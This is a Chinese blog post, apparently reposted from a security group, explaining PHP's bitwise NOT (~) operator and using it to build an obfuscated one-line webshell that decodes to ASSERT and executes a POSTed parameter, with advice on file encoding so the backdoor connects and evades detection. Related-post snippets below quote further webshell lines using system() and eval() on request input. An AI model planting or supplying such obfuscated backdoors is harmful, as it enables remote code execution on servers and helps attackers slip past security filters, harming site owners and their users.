php变量函数后门,PHP中使用按位取反(~)函数创建后门

最新推荐文章于 2023-10-24 12:29:54 发布
最新推荐文章于 2023-10-24 12:29:54 发布
阅读量194 收藏
点赞数
文章标签: php变量函数后门

1)PHP ~位运算符

PHP: 位运算符 - http://www.php.net/manual/zh/language.operators.bitwise.php

前一段时间老外在twitter上爆出个有趣的东西,一串疑似乱码的字符串访问后却能正常输出1337,于是便有了以下研究成果。

~ $a Not(按位取反) 将 $a 中为 0 的位设为 1,反之亦然。

PHP 的 ini 设定 error_reporting 使用了按位的值,提供了关闭某个位的真实例子。要显示除了提示级别之外的所有错误。

php.ini 中是这样用的: E_ALL & ~E_NOTICE

具体运作方式是先取得 E_ALL 的值: 00000000000000000111011111111111

再取得 E_NOTICE 的值: 00000000000000000000000000001000

然后通过 ~ 将其取反: 11111111111111111111111111110111

最后再用按位与 AND(&)得到两个值中都设定了(为 1)的位: 00000000000000000111011111110111

2)分析并重现

这个就是当时最原始的代码实现效果:

0c36d97ac5555f2819aab1a083f28574.jpg

当看到这个效果的时候最先想到的就是绕过防火墙等后门的实现,之后开始考虑这是哪种编码方式?

后来同李普君测试中发现直接使用echo ~'1';等则会直接输出以上的'乱码',方到看完PHP官方~函数的解释才恍然大悟。

d4bae82369b0c1b68858002c3c951d2b.jpg

那么我们便可以开始写一句话试试效果了:

?1

2

3

4

$x=~Ÿ¬¬º­«;

$x($_POST[~¹¹ÏÏÏÏ]);

?>

dce43b280eb151e970508f0e4c6edb01.jpg

这里定义$x变量为ASSERT,然后密码为FF0000直接链接后门便可,因为当位取反出来'乱码'后我们再取一次反即可返回正常值。

3)关于编码与免杀

当重现这个后门的时候我发现,直接Copy过来的直接HTTP状态500,源头是编码问题,上面这种'乱码'其实为西欧(ISO-8859-15)。

实际过程中我们遇到了多次后门无法链接出现500的错误均势因为编码问题,如果默认编码无法识别将编码方式保存为这种即可(GBKUTF8...均不能成功使用)

be2f41445abb8568cd4f37d211241025.png

Author: Evi1m0 [Email: evi1m0#ff0000.cc]

From: 邪红色信息安全组织 [FF0000 TeAm]

weixin_39981185
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
巧用成员模板函数为你的类留下后门
关文林的专栏
03-30 5534
 巧用成员模板函数为你的类留下后门如果你的类需要扩展功能,除了修改源码之外,你也可以从这个类派生一个类来对这个类作扩充。比如有如下一个类。class cls{public:    int fun( int a)    {       //一些处理       return 0;    }};类cls有一个函数fun能针对一个int型的数据进行一些必要
php变量函数后门,项目实战 | 记一次对某猥琐PHP后门的爆菊
weixin_39814482的博客
03-12 547
最近遇到个文件,打开一看只有几行注释?看了下字节数却很大,横向进度条很长啊,通过web访问是空白,看上去应该是藏了后门了。ps:这种方式遇到粗心/没有经验的管理员可能混过去,但若使用win自带的记事本(需开启自动换行)则一览无余。实际上换行整理一下:用Notepad++自带的正则替换简单做了下格式处理。另外在下面的代码发现了eval/*r49557ec*/(还插了注释,这个小方法很有意思,测试...
php变量函数后门,PHP函数usort是咋回事?还能当后门?
weixin_42299873的博客
03-12 221
开始原谅我见识短,没用过usort函数上面连接的文章,发现有这个函数于是刚刚了解了下usort函数usort函数干嘛的?通俗点说就是一个稍微复杂点的数组,如果用php自带的函数不是很方便所以用户可以自己定义一个函数,然后使用usort函数来进行回调function my_sort($a,$b){if ($a==$b){return 0;}else{return ($a}}$list = arra...
php-x ip bus,手把手教你编写一个简单的PHP模块形态的后门
weixin_30151565的博客
03-09 523
看到Freebuf 小编发表的用这个隐藏于PHP模块的rootkit,就能持久接管服务器文章,很感兴趣,苦无作者没留下PoC,自己研究一番,有了此文0×00. 引言PHP是一个非常流行的web server端的script语言.目前很多web应用程序都基于php语言实现。由于php是个开源软件并易于扩展,所以我们可以通过编写一个PHP模块(module 或者叫扩展 extension)来实现一个...
php后门的编写
demo1573的博客
09-15 542
0x1 原理 1、执行系统命令的函数 proc_open, popen, exec, shell_exec,passthru,system 这里只给出两个例子,其他的可以查看php手册编写 system() ? php system($_GET['input']); ? http://192.168.247.133:81/shell.php?input=dir ``执行命令 ``执行命令等...
PHP编程函数安全篇
10-27
PHP编程,确保函数的安全性至关重要,因为不安全的函数使用可能会导致一系列严重的安全问题,如SQL注入、跨站脚本攻击(XSS)、路径泄露、远程命令执行等。以下是一些关于PHP编程函数安全的重点: 1. 文件包含...
php无eval后门1
08-03
PHP 无 eval 后门PHP 的一种常见的后门技术,通过使用 eval 函数、assert 函数、create_function 函数、preg_replace 函数、mb_ereg_replace 函数、回调函数等方式来执行恶意代码。这些方法可以绕过一些安全...
基于PHP的Mysql BackDoor PHP+Mysql服务器 后门.zip
07-22
4. **PHP安全编程**:包括变量过滤、输入验证、避免使用eval()函数、正确处理文件上传等最佳实践,以防止后门的植入。 5. **服务器安全配置**:如限制不必要的网络服务,定期更新软件,设置强密码,启用日志监控,...
基于PHP的RIPro主题 (免授权修复后门完美版).zip
07-22
"免授权修复后门完美版"指的是这个主题已经经过了安全优化,去除了可能存在的授权验证后门,并修复了任何已知的安全漏洞,以确保用户在使用过程数据的安全。 在使用基于PHP的RIPro主题时,以下是一些关键的知识点...
2233.php:PHP后门发电机
05-13
2233.php是一个Webshel​​l生成器,它在每次运行时为Web Shell生成函数变量名,并将它们吐到stdout。 用法 $ php -f 2233.php ...然后弹出一个新的Web Shell。 示例壳 <?php $SnHCQlIQNe2 = gzinflate(base64...
PHP函数的定义与最简单后门原理
最新发布
一个努力学习网安的小牛马
10-24 126
php简单函数的定义和简单后门的原理
PHP逻辑运算符(取反)的用法
teng_liang的博客
06-02 1598
!的用法 在PHP的开发过程,经常会用到逻辑运算符’!’,作为取反;但是以下情况需要注意,否则很容易出现错误: var_dump(!(3>4));exit; // true var_dump(!3>4);exit; // false var_dump(!3<4);exit; // true 第一种情况,是先计算括号内部的结果,为false,然后取反,最终返回true; 第二种情况,优先计算3取反,为false,然后和4做比较,最终返回false; 第三种同第二种。 null $data
php取反empty,PHP变量& is_null(),empty(),isset()三个函数的功能,参数,返回值
weixin_28312391的博客
04-06 268
实例$a;$b=false;$c='';$d=0;$e=null;/*一、is_null()什么时候返回true?*1.变量已声明但未初始化,默认为null值*2.变量显示赋值为null*3.unset()销毁后,变量为null值*总结:变量不存在/没赋值/值为null,则返回true*/@var_dump(is_null($a));//返回truevar_dump(is...
php哪个运算符表示取反,php的运算符总结
weixin_33505417的博客
03-23 465
/* PHP的运算符号** 运算元 运算符 运算元** 1 + 1** 一元运算符 +1 -1 ++ -- !** 二元运算符 + - * / % > < = == ===** 三元运算符 1 ? 2 : 3** $a = 10;** 算术运算符号 + - * / % ++ ...
php函数nl2br的反函数br2nl
phper
06-23 5001
Mr 真是搞不明白,php里有nl2br这样的好函数,但是为什么就没有它的反函数呢?只好自己在网站找了一个br2nl。分两个版本:php和javascript的。 php版的代码如下: function br2nl($text) {         return preg_replace('//i', '', $text);    }   javascript版的代码如下:
【实验】一句话后门利用及操作
weixin_34247299的博客
10-13 336
准备
php位运算 与 或 异或 取反
x7jntb93v9的博客
06-15 352
* 13&7 13的补码 00000000 00000000 00000000 00001101 7的补码 00000000 00000000 00000000 00000111 13&7 00000000 00000000 00000000 00000101 = 5 5|4 5的补码 00000000 00000000 00000000 00000101 4的补码 00000000 000000
php后门分析
shy的博客
10-29 302
这篇文件主要用来分析平时工作遇到的各种PHP后门文件。 1,变形一句话 <?php $str=1; function mains($str) { eval($str); } mains($_POST[1]); ?> 分析:$str=1这个定义的变量我真的没看懂有什么用,删除了仍旧可以执行的这个后门。 2,任意文件下载 <?php set_time_limit(0); if(isset($_GET['url']) && isset($_GET['file
按位取反 (~)的作用
05-12
在C语言按位取反(~)操作符作用于整数类型的变量或常量,将其转换为补码表示后,对每一位进行取反操作。它通常用于位运算、掩码操作、检查某一位是否为0或1等场景。例如,可以使用按位取反操作来将某一位设置为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值